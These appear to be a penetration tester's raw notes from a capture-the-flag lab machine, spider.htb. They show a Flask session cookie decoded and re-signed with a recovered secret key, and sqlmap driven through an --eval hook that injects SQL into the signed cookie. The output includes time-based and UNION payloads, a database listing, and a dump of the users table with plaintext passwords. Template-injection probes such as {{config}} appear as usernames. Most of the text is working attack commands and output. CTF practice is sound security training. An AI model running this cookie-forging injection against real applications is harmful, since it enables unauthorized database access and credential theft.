3 :80 sqlmap via flask cookie

Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask

$ flask-unsign -d -c 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo' -S 'Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942'
$ flask-unsign --decode --cookie 'eyJjYXJ0X2l0ZW1zIjpbXX0.YV43Rg.q_4li1GrgkBKOQe7AbK6R24bxOo'
{'cart_items': []}

# last link on page talks about using sqlmap using flask session cookie
Using https://book.hacktricks.xyz/pentesting/pentesting-web/flask#sqli-in-flask-session-cookie-with-sqlmap
| > https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#eval

Using https://book.hacktricks.xyz/pentesting-web/sql-injection/sqlmap#eval

# ran as it was got errors, then explored and realized its uuid (not uid).
$ sqlmap http://spider.htb/ --eval "from flask_unsign import session as s; session = s.sign({'uuid': session}, secret='Sup3rUnpredictableK3yPleas3Leav3mdanfe12332942')" --cookie="session=*" --delay 1 --dbs

[*] starting @ 17:28:59 /2021-10-06/
custom injection marker ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] Y
[17:29:05] [WARNING] it seems that you've provided empty parameter value(s) for testing. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [WARNING] provided value for parameter 'session' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[17:29:05] [INFO] testing connection to the target URL
[17:29:07] [INFO] testing if the target URL content is stable
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
[17:29:13] [INFO] target URL content is stable
[17:29:13] [INFO] testing if (custom) HEADER parameter 'Cookie #1*' is dynamic
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
[17:29:18] [WARNING] (custom) HEADER parameter 'Cookie #1*' does not appear to be dynamic
[17:29:19] [WARNING] heuristic (basic) test shows that (custom) HEADER parameter 'Cookie #1*' might not be injectable
[17:29:20] [INFO] testing for SQL injection on (custom) HEADER parameter 'Cookie #1*'
[17:29:20] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[17:29:32] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[17:29:34] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[17:29:40] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[17:29:46] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[17:29:51] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[17:29:57] [INFO] testing 'Generic inline queries'
[17:29:58] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[17:30:03] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[17:30:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[17:30:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[17:30:29] [INFO] (custom) HEADER parameter 'Cookie #1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[17:30:54] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[17:30:54] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[17:31:18] [INFO] target URL appears to be UNION injectable with 1 columns
[17:31:21] [INFO] (custom) HEADER parameter 'Cookie #1*' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
(custom) HEADER parameter 'Cookie #1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 74 HTTP(s) requests:
---
Parameter: Cookie #1* ((custom) HEADER)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: session=' AND (SELECT 6878 FROM (SELECT(SLEEP(5)))Dspl) AND 'xliC'='xliC

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: session=' UNION ALL SELECT CONCAT(0x717a786b71,0x756e616e446a5651496b4662456159494656584b736d77776f554b57787a477867794e4e73644845,0x717a6a6a71)-- -
'
---
[17:31:29] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx 1.14.0
back-end DBMS: MySQL >= 5.0.12
[17:31:36] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] shop
[*] sys

[17:31:37] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 76 times
[17:31:37] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'

[*] ending @ 17:31:37 /2021-10-06/
---

# -D shop --tables
[17:32:49] [INFO] fetching tables for database: 'shop'
do you want to URL encode cookie values (implementation specific)? [Y/n] Y
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] n
Database: shop
[4 tables]
+----------+
| items    |
| messages |
| support  |
| users    |
+----------+

# -D shop --dump-all
Database: shop
Table: messages
[1 entry]
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| post_id | creator | message                                                                           | timestamp           |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+
| 1       | 1       | Fix the <b>/a1836bb97e5f4ce6b3e8f25693c1a16c.unfinished.supportportal</b> portal! | 2020-04-24 15:02:41 |
+---------+---------+-----------------------------------------------------------------------------------+---------------------+

[17:34:56] [INFO] table 'shop.messages' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/messages.csv'
[17:34:56] [INFO] fetching columns for table 'items' in database 'shop'
[17:34:57] [INFO] fetching entries for table 'items' in database 'shop'
Database: shop
Table: items
[6 entries]
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| id | name        | price | image_path                                        | description                                                             |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+
| 1  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 2  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 3  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 4  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
| 5  | Chair       | 1337  | stefan-chair-brown-black__0727320_PE735593_S5.JPG | This is a beautiful chair, finest quality, previously owned by Mitnick. |
| 6  | Black Chair | 1337  | martin-chair-black-black__0729761_PE737128_S5.JPG | This is the same as the other one but in black.                         |
+----+-------------+-------+---------------------------------------------------+-------------------------------------------------------------------------+

[17:34:58] [INFO] table 'shop.items' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/items.csv'
[17:34:58] [INFO] fetching columns for table 'users' in database 'shop'
[17:34:59] [INFO] fetching entries for table 'users' in database 'shop'
Database: shop
Table: users
[9 entries]
+----+--------------------------------------+------------+--------------------------------------+
| id | uuid                                 | name       | password                             |
+----+--------------------------------------+------------+--------------------------------------+
| 1  | 129f60ea-30cf-4065-afb9-6be45ad38b73 | chiv       | ch1VW4sHERE7331                      |
| 2  | 39643204-192c-4bb8-88d2-61dc81de7510 | kashz      | kashz                                |
| 3  | <blank>                              | hzx"zxc    | ddb8ef28-a54a-4da1-b734-f5eff7af2c0f | #"
| 4  | a7e52b68-53d2-4cf2-b072-6aff45d7d31c | ${7*7}     | kashz                                |
| 5  | bb731ee3-c354-46ea-93ad-ce05d99f1f29 | {{7*7}}    | kashz                                |
| 6  | 4459e9dc-f87d-45c8-a0e2-f4480f4a6398 | {{7*7}}    | kashz                                |
| 7  | d8a9109b-4ff2-46e1-bc85-4e77c2ca0c35 | {{10*10}}  | kashz                                |
| 8  | b3d3c283-26c8-4d4a-b7c0-cf1fc000f7bb | {{7*'7'}}  | KASHZ                                |
| 9  | 4480d8e5-eda9-4053-be22-e807f716a45a | {{config}} | kashz                                |
+----+--------------------------------------+------------+--------------------------------------+

[17:35:00] [INFO] table 'shop.users' dumped to CSV file '/home/kashz/.local/share/sqlmap/output/spider.htb/dump/shop/users.csv'
[17:35:00] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[17:35:00] [INFO] fetched data logged to text files under '/home/kashz/.local/share/sqlmap/output/spider.htb'

[*] ending @ 17:35:00 /2021-10-06/